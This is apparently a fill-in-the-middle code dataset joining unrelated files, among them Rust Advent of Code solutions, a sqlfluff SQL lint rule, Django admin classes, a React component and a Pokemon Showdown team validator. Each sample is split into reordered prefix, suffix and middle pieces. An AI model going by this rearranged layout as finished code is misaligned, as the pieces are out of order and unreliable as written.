let mut xmas = Xmas::new(preamble_size);
let mut remaining_numbers = numbers.clone();
remaining_numbers
.drain(0..preamble_size)
.for_each(|number| xmas.push(number));
let mut invalid_number = None;
for number in remaining_numbers {
if xmas.is_valid(number) {
xmas.push(number);
} else {
invalid_number = Some(number);
break;
}
}
match invalid_number {
Some(n) => n,
None => panic!("Couldn't find first invalid number"),
}
};
println!("First invalid number: {}", invalid_number);
match find_contiguous_summands(numbers, invalid_number) {
Some(sequence) => {
let min = sequence.iter().min().unwrap();
let max = sequence.iter().max().unwrap();
println!(
"Sequence: {:#?}\nSmallest: {}\nLargest: {}\nSum: {}",
sequence,
min,
max,
min + max
)
}
None => panic!("Failed to find sequence"),
}
Ok(())
}
| {
self.numbers.push_back(number);
if self.numbers.len() > self.preamble_size {
self.numbers.pop_front();
}
} |
L018.py | """Implementation of Rule L018."""
from sqlfluff.core.parser import NewlineSegment, WhitespaceSegment
from sqlfluff.core.rules.base import BaseRule, LintFix, LintResult
from sqlfluff.core.rules.doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L018(BaseRule):
"""WITH clause closing bracket should be aligned with WITH keyword.
| **Anti-pattern**
| The • character represents a space.
| In this example, the closing bracket is not aligned with WITH keyword.
.. code-block::
WITH zoo AS (
SELECT a FROM foo
••••)
SELECT * FROM zoo
| **Best practice**
| Remove the spaces to align the WITH keyword with the closing bracket.
.. code-block::
WITH zoo AS (
SELECT a FROM foo
)
SELECT * FROM zoo
"""
_works_on_unparsable = False
config_keywords = ["tab_space_size"]
def _eval(self, segment, raw_stack, **kwargs):
"""WITH clause closing bracket should be aligned with WITH keyword.
Look for a with clause and evaluate the position of closing brackets.
"""
# We only trigger on start_bracket (open parenthesis)
if segment.is_type("with_compound_statement"):
raw_stack_buff = list(raw_stack)
# Look for the with keyword
for seg in segment.segments:
if seg.name.lower() == "with":
seg_line_no = seg.pos_marker.line_no
break
else: | # in which case then the user will have to fix that first.
if any(s.is_type("unparsable") for s in segment.segments):
return LintResult()
# If it's parsable but we still didn't find a with, then
# we should raise that.
raise RuntimeError("Didn't find WITH keyword!")
def indent_size_up_to(segs):
seg_buff = []
# Get any segments running up to the WITH
for elem in reversed(segs):
if elem.is_type("newline"):
break
elif elem.is_meta:
continue
else:
seg_buff.append(elem)
# reverse the indent if we have one
if seg_buff:
seg_buff = list(reversed(seg_buff))
indent_str = "".join(seg.raw for seg in seg_buff).replace(
"\t", " " * self.tab_space_size
)
indent_size = len(indent_str)
return indent_size, indent_str
balance = 0
with_indent, with_indent_str = indent_size_up_to(raw_stack_buff)
for seg in segment.iter_segments(expanding=["common_table_expression"]):
if seg.name == "start_bracket":
balance += 1
elif seg.name == "end_bracket":
balance -= 1
if balance == 0:
closing_bracket_indent, _ = indent_size_up_to(raw_stack_buff)
indent_diff = closing_bracket_indent - with_indent
# Is indent of closing bracket not the same as
# indent of WITH keyword.
if seg.pos_marker.line_no == seg_line_no:
# Skip if it's the one-line version. That's ok
pass
elif indent_diff < 0:
return LintResult(
anchor=seg,
fixes=[
LintFix(
"create",
seg,
WhitespaceSegment(" " * (-indent_diff)),
)
],
)
elif indent_diff > 0:
# Is it all whitespace before the bracket on this line?
prev_segs_on_line = [
elem
for elem in segment.iter_segments(
expanding=["common_table_expression"]
)
if elem.pos_marker.line_no == seg.pos_marker.line_no
and elem.pos_marker.line_pos < seg.pos_marker.line_pos
]
if all(
elem.is_type("whitespace") for elem in prev_segs_on_line
):
# We can move it back, it's all whitespace
fixes = [
LintFix(
"create",
seg,
[WhitespaceSegment(with_indent_str)],
)
] + [
LintFix("delete", elem)
for elem in prev_segs_on_line
]
else:
# We have to move it to a newline
fixes = [
LintFix(
"create",
seg,
[
NewlineSegment(),
WhitespaceSegment(with_indent_str),
],
)
]
return LintResult(anchor=seg, fixes=fixes)
else:
raw_stack_buff.append(seg)
return LintResult() | # This *could* happen if the with statement is unparsable, |
admin.py | """
Admin views for ecommerce models
"""
from django.contrib import admin
from ecommerce.models import (
Coupon,
CouponAudit,
CouponInvoice,
CouponInvoiceAudit,
Line,
Order,
OrderAudit,
Receipt,
RedeemedCoupon,
RedeemedCouponAudit,
UserCoupon,
UserCouponAudit,
)
from micromasters.utils import get_field_names
class LineAdmin(admin.ModelAdmin):
"""Admin for Line"""
model = Line
readonly_fields = get_field_names(Line)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class OrderAdmin(admin.ModelAdmin):
"""Admin for Order"""
model = Order
list_filter = ('status',)
list_display = ('id', 'user', 'status', 'created_at', 'course_key',)
search_fields = (
'user__username',
'user__email',
)
readonly_fields = [name for name in get_field_names(Order) if name != 'status']
def course_key(self, obj):
"""
returns first course key associated with order
"""
line = obj.line_set.first()
return line.course_key
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
def save_model(self, request, obj, form, change):
"""
Saves object and logs change to object
"""
obj.save_and_log(request.user)
class OrderAuditAdmin(admin.ModelAdmin):
"""Admin for OrderAudit"""
model = OrderAudit
readonly_fields = get_field_names(OrderAudit)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class ReceiptAdmin(admin.ModelAdmin):
"""Admin for Receipt"""
model = Receipt
readonly_fields = get_field_names(Receipt)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class CouponInvoiceAdmin(admin.ModelAdmin):
"""Admin for CouponInvoice"""
model = CouponInvoice
def save_model(self, request, obj, form, change):
"""
Saves object and logs change to object
"""
obj.save_and_log(request.user)
class CouponInvoiceAuditAdmin(admin.ModelAdmin):
"""Admin for CouponInvoiceAudit"""
model = CouponInvoiceAudit
readonly_fields = get_field_names(CouponInvoiceAudit)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class CouponAdmin(admin.ModelAdmin):
"""Admin for Coupon"""
model = Coupon
search_fields = (
'coupon_code',
'invoice__invoice_number',
'invoice__description',
)
list_filter = [
'invoice',
'enabled',
'coupon_type',
'amount_type',
]
def save_model(self, request, obj, form, change):
"""
Saves object and logs change to object
"""
obj.save_and_log(request.user)
class CouponAuditAdmin(admin.ModelAdmin):
"""Admin for CouponAudit"""
model = CouponAudit
readonly_fields = get_field_names(CouponAudit)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class RedeemedCouponAdmin(admin.ModelAdmin):
"""Admin for RedeemedCoupon"""
model = RedeemedCoupon
readonly_fields = get_field_names(RedeemedCoupon)
def save_model(self, request, obj, form, change):
"""
Saves object and logs change to object
"""
obj.save_and_log(request.user)
class RedeemedCouponAuditAdmin(admin.ModelAdmin):
"""Admin for RedeemedCouponAudit"""
model = RedeemedCouponAudit
readonly_fields = get_field_names(RedeemedCouponAudit)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class UserCouponAdmin(admin.ModelAdmin):
"""Admin for UserCoupon"""
model = UserCoupon
readonly_fields = get_field_names(UserCoupon)
def save_model(self, request, obj, form, change):
"""
Saves object and logs change to object
"""
obj.save_and_log(request.user)
class | (admin.ModelAdmin):
"""Admin for UserCouponAudit"""
model = UserCouponAudit
readonly_fields = get_field_names(UserCouponAudit)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
admin.site.register(CouponInvoice, CouponInvoiceAdmin)
admin.site.register(CouponInvoiceAudit, CouponInvoiceAuditAdmin)
admin.site.register(Coupon, CouponAdmin)
admin.site.register(CouponAudit, CouponAuditAdmin)
admin.site.register(Line, LineAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderAudit, OrderAuditAdmin)
admin.site.register(RedeemedCoupon, RedeemedCouponAdmin)
admin.site.register(RedeemedCouponAudit, RedeemedCouponAuditAdmin)
admin.site.register(Receipt, ReceiptAdmin)
admin.site.register(UserCoupon, UserCouponAdmin)
admin.site.register(UserCouponAudit, UserCouponAuditAdmin)
| UserCouponAuditAdmin |
main.rs | use splitmut::{SplitMut, SplitMutError};
use std::{
cmp::{min, Ordering},
collections::{HashMap, HashSet},
fmt,
};
#[derive(PartialEq)]
enum Side {
Immune,
Infection,
Stalemate,
}
impl fmt::Display for Side {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self == &Side::Immune {
write!(f, "Immune")?;
} else {
write!(f, "Infection")?;
}
Ok(())
}
}
struct Army {
side: Side,
units: u64,
hitpoints: u64,
weak_to: HashSet<String>,
immune_to: HashSet<String>,
damage: u64,
damage_type: String,
initiative: u64,
}
impl Army {
fn new(
side: Side,
units: u64,
hitpoints: u64,
weak_to: &[String],
immune_to: &[String],
damage: u64,
damage_type: String,
initiative: u64,
) -> Army {
let mut a = Army {
side,
units,
hitpoints,
damage,
initiative,
damage_type: damage_type,
weak_to: HashSet::new(),
immune_to: HashSet::new(),
};
for weak in weak_to {
a.weak_to.insert(weak.to_string());
}
for immune in immune_to {
a.immune_to.insert(immune.to_string());
}
a
}
fn is_side(&self, side: &Side) -> bool {
&self.side == side
}
fn effective_power(&self) -> u64 {
self.units * self.damage
}
fn target_selection_order(&self) -> (u64, u64) {
(self.effective_power(), self.initiative)
}
fn would_damage(&self, other: &Army) -> u64 {
if other.immune_to.contains(&self.damage_type) {
return 0;
}
if other.weak_to.contains(&self.damage_type) {
return 2 * self.damage * self.units;
}
return self.damage * self.units;
}
fn targeting_cmp(&self, a: &Army, b: &Army) -> Ordering {
if self.would_damage(a) > self.would_damage(b) {
return Ordering::Less;
}
if self.would_damage(b) > self.would_damage(a) {
return Ordering::Greater;
}
if a.effective_power() > b.effective_power() {
return Ordering::Less;
}
if a.effective_power() < b.effective_power() {
return Ordering::Greater;
}
if a.initiative > b.initiative {
return Ordering::Less;
}
if a.initiative < b.initiative {
return Ordering::Greater;
}
return Ordering::Equal;
}
fn take_damage(&mut self, amt: u64) -> u64 {
let units_lost = min(amt / self.hitpoints, self.units);
self.units -= units_lost;
units_lost
}
}
impl fmt::Display for Army {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result |
}
fn battle_with_boost(boost_amount: u64) -> Side {
let mut armies = Vec::new();
armies.push(Army::new(Side::Immune, 4400, 10384, &["slashing".to_string()], &[], 21 + boost_amount, "radiation".to_string(), 16));
armies.push(Army::new(Side::Immune, 974, 9326, &["radiation".to_string()], &[], 86 + boost_amount, "cold".to_string(), 19));
armies.push(Army::new(Side::Immune, 543, 2286, &[], &[], 34 + boost_amount, "cold".to_string(), 13));
armies.push(Army::new(Side::Immune, 47, 4241, &["slashing".to_string(), "cold".to_string()], &["radiation".to_string()], 889 + boost_amount, "cold".to_string(), 10));
armies.push(Army::new(Side::Immune, 5986, 4431, &[], &[], 6 + boost_amount, "cold".to_string(), 8));
armies.push(Army::new(Side::Immune, 688, 1749, &[], &["slashing".to_string(), "radiation".to_string()], 23 + boost_amount, "cold".to_string(), 7));
armies.push(Army::new(Side::Immune, 61, 1477, &[], &[], 235 + boost_amount, "fire".to_string(), 1));
armies.push(Army::new(Side::Immune, 505, 9333, &["slashing".to_string(), "cold".to_string()], &[], 174 + boost_amount, "radiation".to_string(), 9));
armies.push(Army::new(Side::Immune, 3745, 8367, &["cold".to_string()], &["fire".to_string(), "slashing".to_string(), "radiation".to_string()], 21 + boost_amount, "bludgeoning".to_string(), 3));
armies.push(Army::new(Side::Immune, 111, 3482, &[], &[], 311 + boost_amount, "cold".to_string(), 15));
armies.push(Army::new(Side::Infection, 2891, 32406, &["fire".to_string(), "bludgeoning".to_string()], &[], 22, "slashing".to_string(), 2));
armies.push(Army::new(Side::Infection, 1698, 32906, &["radiation".to_string()], &[], 27, "fire".to_string(), 17));
armies.push(Army::new(Side::Infection, 395, 37715, &[], &["fire".to_string()], 183, "cold".to_string(), 6));
armies.push(Army::new(Side::Infection, 3560, 45025, &["radiation".to_string()], &["fire".to_string()], 20, "cold".to_string(), 14));
armies.push(Army::new(Side::Infection, 2335, 15938, &["cold".to_string()], &[], 13, "slashing".to_string(), 11));
armies.push(Army::new(Side::Infection, 992, 19604, &[], &[ "slashing".to_string(), "bludgeoning".to_string(), "radiation".to_string(), ], 38, "radiation".to_string(), 5));
armies.push(Army::new(Side::Infection, 5159, 44419, &["fire".to_string()], &["slashing".to_string()], 13, "bludgeoning".to_string(), 4));
armies.push(Army::new(Side::Infection, 2950, 6764, &["slashing".to_string()], &[], 4, "radiation".to_string(), 18));
armies.push(Army::new(Side::Infection, 6131, 25384, &["slashing".to_string()], &["bludgeoning".to_string(), "cold".to_string()], 7, "cold".to_string(), 12));
armies.push(Army::new(Side::Infection, 94, 29265, &["cold".to_string(), "bludgeoning".to_string()], &[], 588, "bludgeoning".to_string(), 20));
//armies.push(Army::new(Side::Immune, 17, 5390, &["radiation".to_string(), "bludgeoning".to_string()], &[], 4507, "fire".to_string(), 2));
//armies.push(Army::new(Side::Immune, 989, 1274, &["bludgeoning".to_string(), "slashing".to_string()], &["fire".to_string()], 25, "slashing".to_string(), 3));
//armies.push(Army::new(Side::Infection, 801, 4706, &["radiation".to_string()], &[], 116, "bludgeoning".to_string(), 1));
//armies.push(Army::new(Side::Infection, 4485, 2961, &["fire".to_string(), "cold".to_string()], &["radiation".to_string()], 12, "slashing".to_string(), 4));
let mut round = 1;
loop {
//println!("### ROUND {} ###", round);
// Target selection
armies.sort_unstable_by(|x, y| y.target_selection_order().cmp(&x.target_selection_order()));
let units_before = armies.iter().fold(0, |a, x| a + x.units);
// A map from attackers to attackees, now that we won't reorder them
let mut attacks = HashMap::new();
let mut attacked_by = HashMap::new();
for (idx, army) in armies.iter().enumerate() {
let mut candidate_target_idx: Vec<usize> = (0..armies.len())
.filter(|&x| !armies[x].is_side(&army.side))
.filter(|x| !attacked_by.contains_key(x))
.collect();
candidate_target_idx
.sort_unstable_by(|&a, &b| army.targeting_cmp(&armies[a], &armies[b]));
if candidate_target_idx.is_empty()
|| army.would_damage(&armies[candidate_target_idx[0]]) == 0
{
// No target.
// println!("Army {} has no valid targets, not attacking.", idx);
continue;
}
attacks.insert(idx, candidate_target_idx[0]);
attacked_by.insert(candidate_target_idx[0], idx);
}
// println!("### Attacking phase ###");
// Attacking phase.
let mut attack_order: Vec<usize> = (0..armies.len()).collect();
attack_order.sort_unstable_by(|&a, &b| armies[b].initiative.cmp(&armies[a].initiative));
for idx in attack_order {
if attacks.contains_key(&idx) {
let (attacking, attacked) = armies.get2_mut(idx, attacks[&idx]);
let attacking = attacking.unwrap();
let attacked = attacked.unwrap();
let damage = attacking.would_damage(&attacked);
let units_lost = attacked.take_damage(damage);
//println!("Army {} attacks army {}, doing {} damage and destroying {} units", attacking, attacked, damage, units_lost);
}
}
// Remove armies with no units left
armies.retain(|x| x.units > 0);
// If one side has no armies, we are done.
let (immune, infect): (Vec<&Army>, Vec<&Army>) =
armies.iter().partition(|x| x.is_side(&Side::Immune));
if immune.is_empty() || infect.is_empty() {
break;
}
let units_after = armies.iter().fold(0, |a, x| a + x.units);
if units_before == units_after {
// No units have died, and we are in a stalemate.
return Side::Stalemate;
}
round += 1;
}
println!("These armies are left after the glorious battle:");
let mut total_units = 0;
for army in &armies {
println!("{}", army);
total_units += army.units;
}
println!("There are {} units in the winning army.", total_units);
armies.remove(0).side
}
fn main() {
battle_with_boost(0);
let mut boost = 1;
println!("Boosting immune system by {}", boost);
while battle_with_boost(boost) != Side::Immune {
boost += 1;
println!("Boosting immune system by {}", boost);
}
}
| {
write!(
f,
"{} group has {} units each with {} hit points",
self.side, self.units, self.hitpoints
)?;
if !self.weak_to.is_empty() {
write!(
f,
" weak to {}",
self.weak_to
.iter()
.cloned()
.collect::<Vec<String>>()
.join(", ")
)?;
}
if !self.immune_to.is_empty() {
write!(
f,
" immune to {}",
self.immune_to
.iter()
.cloned()
.collect::<Vec<String>>()
.join(", ")
)?;
}
write!(
f,
" with an attack that does {} {} damage at initiative {}",
self.damage, self.damage_type, self.initiative
)?;
Ok(())
} |
dashboard.js | import React, { Component } from 'react';
import TabNav from './tabnav';
import NewsletterGrid from "./newsletter/newsletterGrid";
import RequestsGrid from "./requests/requestsGrid";
class Dashboard extends Component {
constructor(props) {
super(props);
this.state = { | component: <NewsletterGrid history={this.props.history}/>
},
{
title: 'Requests',
active: false,
component: <RequestsGrid history={this.props.history}/>
},
]
}
}
handleTabChange = (title) => {
const tabs = this.state.tabs;
tabs.map(tab => {
if(tab.title == title) {
tab.active = true
} else {
tab.active = false
}
})
this.setState({ tabs });
}
render() {
return (
<div className='dashboard'>
<TabNav handleClick={(title) => this.handleTabChange(title)} tabs={this.state.tabs}/>
</div>
)
}
}
export default Dashboard; | tabs: [
{
title: 'Newsletter',
active: true, |
mod.rs | // Copyright 2020 Kazuyuki HIDA <[email protected]> | mod tca9555;
mod tca9554; | // All right reserved.
//
|
P2_characterCount.py | """Character count
This program counts how often each character appears in a string.
"""
def main():
|
if __name__ == '__main__':
main()
| message = 'It was a bright cold day in April, and the clocks were striking thirteen.'
"""str: Message to count characters."""
count = {}
"""dict: Characters as keys and counts as values."""
for character in message:
count.setdefault(character, 0)
count[character] = count[character] + 1
print(count) |
google.py | """
Google web search.
Run queries on Google and return results.
"""
import requests
from kochira import config
from kochira.service import Service, background, Config, coroutine
from kochira.userdata import UserData
service = Service(__name__, __doc__)
@service.config
class Config(Config):
api_key = config.Field(doc="Google API key.")
cx = config.Field(doc="Custom search engine ID.")
@service.command(r"!g (?P<term>.+?)$")
@service.command(r"(?:search for|google) (?P<term>.+?)\??$", mention=True)
@background
def search(ctx, term):
"""
Google.
Search for the given terms on Google.
"""
r = requests.get(
"https://www.googleapis.com/customsearch/v1",
params={
"key": ctx.config.api_key,
"cx": ctx.config.cx,
"q": term
}
).json()
results = r.get("items", [])
if not results:
ctx.respond(ctx._("Couldn't find anything matching \"{term}\".").format(term=term))
return
total = len(results)
ctx.respond(ctx._("({num} of {total}) {title}: {url}").format(
title=results[0]["title"],
url=results[0]["link"],
num=1,
total=total
))
@service.command(r"!image (?P<term>.+?)$")
@service.command(r"image(?: for)? (?P<term>.+?)\??$", mention=True)
@background
def image(ctx, term):
"""
Image search.
Search for the given terms on Google.
"""
r = requests.get(
"https://www.googleapis.com/customsearch/v1",
params={
"key": ctx.config.api_key,
"cx": ctx.config.cx,
"searchType": "image",
"q": term
}
).json()
results = r.get("items", [])
if not results:
ctx.respond(ctx._("Couldn't find anything matching \"{term}\".").format(term=term))
return
| num=1,
total=total
)) | total = len(results)
ctx.respond(ctx._("({num} of {total}) {url}").format(
url=results[0]["link"], |
mod.rs | // Copyright 2021 Red Hat, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use semver::Version;
use serde::{Deserialize, Serialize};
pub(crate) const VERSION: Version = Version::new(3, 2, 0);
include!("schema.rs");
impl Default for Config { | ..Default::default()
},
passwd: None,
storage: None,
systemd: None,
}
}
} | fn default() -> Self {
Self {
ignition: Ignition {
version: Some("3.2.0".into()), |
main.go | package main
import (
"fmt"
"sync"
"time"
)
var wg sync.WaitGroup
func main() {
wg.Add(2)
go foo()
go bar()
wg.Wait()
}
func foo() {
for i := 0; i < 45; i++ {
fmt.Println("Foo:", i)
time.Sleep(3 * time.Millisecond)
}
wg.Done()
}
func | () {
for i := 0; i < 45; i++ {
fmt.Println("Bar:", i)
time.Sleep(20 * time.Millisecond)
}
wg.Done()
}
| bar |
team-validator.ts | /**
* Team Validator
* Pokemon Showdown - http://pokemonshowdown.com/
*
* Handles team validation, and specifically learnset checking.
*
* @license MIT
*/
import {Dex, toID} from './dex';
import {Utils} from '../lib';
/**
* Describes a possible way to get a pokemon. Is not exhaustive!
* sourcesBefore covers all sources that do not have exclusive
* moves (like catching wild pokemon).
*
* First character is a generation number, 1-8.
* Second character is a source ID, one of:
*
* - E = egg, 3rd char+ is the father in gen 2-5, empty in gen 6-7
* because egg moves aren't restricted to fathers anymore
* - S = event, 3rd char+ is the index in .eventData
* - D = Dream World, only 5D is valid
* - V = Virtual Console or Let's Go transfer, only 7V/8V is valid
*
* Designed to match MoveSource where possible.
*/
export type PokemonSource = string;
/**
* Represents a set of possible ways to get a Pokémon with a given
* set.
*
* `new PokemonSources()` creates an empty set;
* `new PokemonSources(dex.gen)` allows all Pokemon.
*
* The set mainly stored as an Array `sources`, but for sets that
* could be sourced from anywhere (for instance, TM moves), we
* instead just set `sourcesBefore` to a number meaning "any
* source at or before this gen is possible."
*
* In other words, this variable represents the set of all
* sources in `sources`, union all sources at or before
* gen `sourcesBefore`.
*/
export class P | {
/**
* A set of specific possible PokemonSources; implemented as
* an Array rather than a Set for perf reasons.
*/
sources: PokemonSource[];
/**
* if nonzero: the set also contains all possible sources from
* this gen and earlier.
*/
sourcesBefore: number;
/**
* the set requires sources from this gen or later
* this should be unchanged from the format's minimum past gen
* (3 in modern games, 6 if pentagon is required, etc)
*/
sourcesAfter: number;
isHidden: boolean | null;
/**
* `limitedEggMoves` is a list of moves that can only be obtained from an
* egg with another father in gen 2-5. If there are multiple such moves,
* potential fathers need to be checked to see if they can actually
* learn the move combination in question.
*
* `null` = the current move is definitely not a limited egg move
*
* `undefined` = the current move may or may not be a limited egg move
*/
limitedEggMoves?: ID[] | null;
/**
* Some Pokemon evolve by having a move in their learnset (like Piloswine
* with Ancient Power). These can only carry three other moves from their
* prevo, because the fourth move must be the evo move. This restriction
* doesn't apply to gen 6+ eggs, which can get around the restriction with
* the relearner.
*/
moveEvoCarryCount: number;
babyOnly?: string;
sketchMove?: string;
hm?: string;
restrictiveMoves?: string[];
/** Obscure learn methods */
restrictedMove?: ID;
constructor(sourcesBefore = 0, sourcesAfter = 0) {
this.sources = [];
this.sourcesBefore = sourcesBefore;
this.sourcesAfter = sourcesAfter;
this.isHidden = null;
this.limitedEggMoves = undefined;
this.moveEvoCarryCount = 0;
}
size() {
if (this.sourcesBefore) return Infinity;
return this.sources.length;
}
add(source: PokemonSource, limitedEggMove?: ID | null) {
if (this.sources[this.sources.length - 1] !== source) this.sources.push(source);
if (limitedEggMove && this.limitedEggMoves !== null) {
this.limitedEggMoves = [limitedEggMove];
} else if (limitedEggMove === null) {
this.limitedEggMoves = null;
}
}
addGen(sourceGen: number) {
this.sourcesBefore = Math.max(this.sourcesBefore, sourceGen);
this.limitedEggMoves = null;
}
minSourceGen() {
if (this.sourcesBefore) return this.sourcesAfter || 1;
let min = 10;
for (const source of this.sources) {
const sourceGen = parseInt(source.charAt(0));
if (sourceGen < min) min = sourceGen;
}
if (min === 10) return 0;
return min;
}
maxSourceGen() {
let max = this.sourcesBefore;
for (const source of this.sources) {
const sourceGen = parseInt(source.charAt(0));
if (sourceGen > max) max = sourceGen;
}
return max;
}
intersectWith(other: PokemonSources) {
if (other.sourcesBefore || this.sourcesBefore) {
// having sourcesBefore is the equivalent of having everything before that gen
// in sources, so we fill the other array in preparation for intersection
if (other.sourcesBefore > this.sourcesBefore) {
for (const source of this.sources) {
const sourceGen = parseInt(source.charAt(0));
if (sourceGen <= other.sourcesBefore) {
other.sources.push(source);
}
}
} else if (this.sourcesBefore > other.sourcesBefore) {
for (const source of other.sources) {
const sourceGen = parseInt(source.charAt(0));
if (sourceGen <= this.sourcesBefore) {
this.sources.push(source);
}
}
}
this.sourcesBefore = Math.min(other.sourcesBefore, this.sourcesBefore);
}
if (this.sources.length) {
if (other.sources.length) {
const sourcesSet = new Set(other.sources);
const intersectSources = this.sources.filter(source => sourcesSet.has(source));
this.sources = intersectSources;
} else {
this.sources = [];
}
}
if (other.restrictedMove && other.restrictedMove !== this.restrictedMove) {
if (this.restrictedMove) {
// incompatible
this.sources = [];
this.sourcesBefore = 0;
} else {
this.restrictedMove = other.restrictedMove;
}
}
if (other.limitedEggMoves) {
if (!this.limitedEggMoves) {
this.limitedEggMoves = other.limitedEggMoves;
} else {
this.limitedEggMoves.push(...other.limitedEggMoves);
}
}
this.moveEvoCarryCount += other.moveEvoCarryCount;
if (other.sourcesAfter > this.sourcesAfter) this.sourcesAfter = other.sourcesAfter;
if (other.isHidden) this.isHidden = true;
}
}
export class TeamValidator {
readonly format: Format;
readonly dex: ModdedDex;
readonly gen: number;
readonly ruleTable: import('./dex-formats').RuleTable;
readonly minSourceGen: number;
readonly toID: (str: any) => ID;
constructor(format: string | Format, dex = Dex) {
this.format = dex.getFormat(format);
this.dex = dex.forFormat(this.format);
this.gen = this.dex.gen;
this.ruleTable = this.dex.getRuleTable(this.format);
this.minSourceGen = this.ruleTable.minSourceGen ?
this.ruleTable.minSourceGen[0] : 1;
this.toID = toID;
}
validateTeam(
team: PokemonSet[] | null,
options: {
removeNicknames?: boolean,
skipSets?: {[name: string]: {[key: string]: boolean}},
} = {}
): string[] | null {
if (team && this.format.validateTeam) {
return this.format.validateTeam.call(this, team, options) || null;
}
return this.baseValidateTeam(team, options);
}
baseValidateTeam(
team: PokemonSet[] | null,
options: {
removeNicknames?: boolean,
skipSets?: {[name: string]: {[key: string]: boolean}},
} = {}
): string[] | null {
const format = this.format;
const dex = this.dex;
let problems: string[] = [];
const ruleTable = this.ruleTable;
if (format.team) {
if (team) {
return [
`This format doesn't let you use your own team.`,
`If you're not using a custom client, please report this as a bug. If you are, remember to use \`/utm null\` before starting a game in this format.`,
];
}
return null;
}
if (!team) {
return [
`This format requires you to use your own team.`,
`If you're not using a custom client, please report this as a bug.`,
];
}
if (!Array.isArray(team)) {
throw new Error(`Invalid team data`);
}
let [minSize, maxSize] = format.teamLength && format.teamLength.validate || [1, 6];
if (format.gameType === 'doubles' && minSize < 2) minSize = 2;
if (['triples', 'rotation'].includes(format.gameType as 'triples') && minSize < 3) minSize = 3;
if (team.length < minSize) problems.push(`You must bring at least ${minSize} Pok\u00E9mon.`);
if (team.length > maxSize) return [`You may only bring up to ${maxSize} Pok\u00E9mon.`];
// A limit is imposed here to prevent too much engine strain or
// too much layout deformation - to be exact, this is the limit
// allowed in Custom Game.
if (team.length > 24) {
problems.push(`Your team has more than than 24 Pok\u00E9mon, which the simulator can't handle.`);
return problems;
}
if (ruleTable.isBanned('nonexistent') && team.length > 6) {
problems.push(`Your team has more than than 6 Pok\u00E9mon.`);
return problems;
}
const teamHas: {[k: string]: number} = {};
let lgpeStarterCount = 0;
let deoxysType;
for (const set of team) {
if (!set) return [`You sent invalid team data. If you're not using a custom client, please report this as a bug.`];
let setProblems: string[] | null = null;
if (options.skipSets && options.skipSets[set.name]) {
for (const i in options.skipSets[set.name]) {
teamHas[i] = (teamHas[i] || 0) + 1;
}
} else {
setProblems = (format.validateSet || this.validateSet).call(this, set, teamHas);
}
if (set.species === 'Pikachu-Starter' || set.species === 'Eevee-Starter') {
lgpeStarterCount++;
if (lgpeStarterCount === 2 && ruleTable.isBanned('nonexistent')) {
problems.push(`You can only have one of Pikachu-Starter or Eevee-Starter on a team.`);
}
}
if (dex.gen === 3 && set.species.startsWith('Deoxys')) {
if (!deoxysType) {
deoxysType = set.species;
} else if (deoxysType !== set.species && ruleTable.isBanned('nonexistent')) {
return [
`You cannot have more than one type of Deoxys forme.`,
`(Each game in Gen 3 supports only one forme of Deoxys.)`,
];
}
}
if (setProblems) {
problems = problems.concat(setProblems);
}
if (options.removeNicknames) {
const species = dex.getSpecies(set.species);
let crossSpecies: Species;
if (format.name === '[Gen 8] Cross Evolution' && (crossSpecies = dex.getSpecies(set.name)).exists) {
set.name = crossSpecies.name;
} else {
set.name = species.baseSpecies;
if (species.baseSpecies === 'Unown') set.species = 'Unown';
}
}
}
for (const [rule, source, limit, bans] of ruleTable.complexTeamBans) {
let count = 0;
for (const ban of bans) {
if (teamHas[ban] > 0) {
count += limit ? teamHas[ban] : 1;
}
}
if (limit && count > limit) {
const clause = source ? ` by ${source}` : ``;
problems.push(`You are limited to ${limit} of ${rule}${clause}.`);
} else if (!limit && count >= bans.length) {
const clause = source ? ` by ${source}` : ``;
problems.push(`Your team has the combination of ${rule}, which is banned${clause}.`);
}
}
for (const rule of ruleTable.keys()) {
if ('!+-'.includes(rule.charAt(0))) continue;
const subformat = dex.getFormat(rule);
if (subformat.onValidateTeam && ruleTable.has(subformat.id)) {
problems = problems.concat(subformat.onValidateTeam.call(this, team, format, teamHas) || []);
}
}
if (format.onValidateTeam) {
problems = problems.concat(format.onValidateTeam.call(this, team, format, teamHas) || []);
}
if (!problems.length) return null;
return problems;
}
validateSet(set: PokemonSet, teamHas: AnyObject): string[] | null {
const format = this.format;
const dex = this.dex;
const ruleTable = this.ruleTable;
let problems: string[] = [];
if (!set) {
return [`This is not a Pokemon.`];
}
let species = dex.getSpecies(set.species);
set.species = species.name;
// Backwards compatability with old Gmax format
if (set.species.toLowerCase().endsWith('-gmax') && this.format.id !== 'gen8megamax') {
set.species = set.species.slice(0, -5);
species = dex.getSpecies(set.species);
if (set.name && set.name.endsWith('-Gmax')) set.name = species.baseSpecies;
set.gigantamax = true;
}
if (set.name && set.name.length > 18) {
if (set.name === set.species) {
set.name = species.baseSpecies;
} else {
problems.push(`Nickname "${set.name}" too long (should be 18 characters or fewer)`);
}
}
set.name = dex.getName(set.name);
let item = dex.getItem(Utils.getString(set.item));
set.item = item.name;
let ability = dex.getAbility(Utils.getString(set.ability));
set.ability = ability.name;
let nature = dex.getNature(Utils.getString(set.nature));
set.nature = nature.name;
if (!Array.isArray(set.moves)) set.moves = [];
const maxLevel = format.maxLevel || 100;
const maxForcedLevel = format.maxForcedLevel || maxLevel;
let forcedLevel: number | null = null;
if (!set.level) {
set.level = (format.defaultLevel || maxLevel);
}
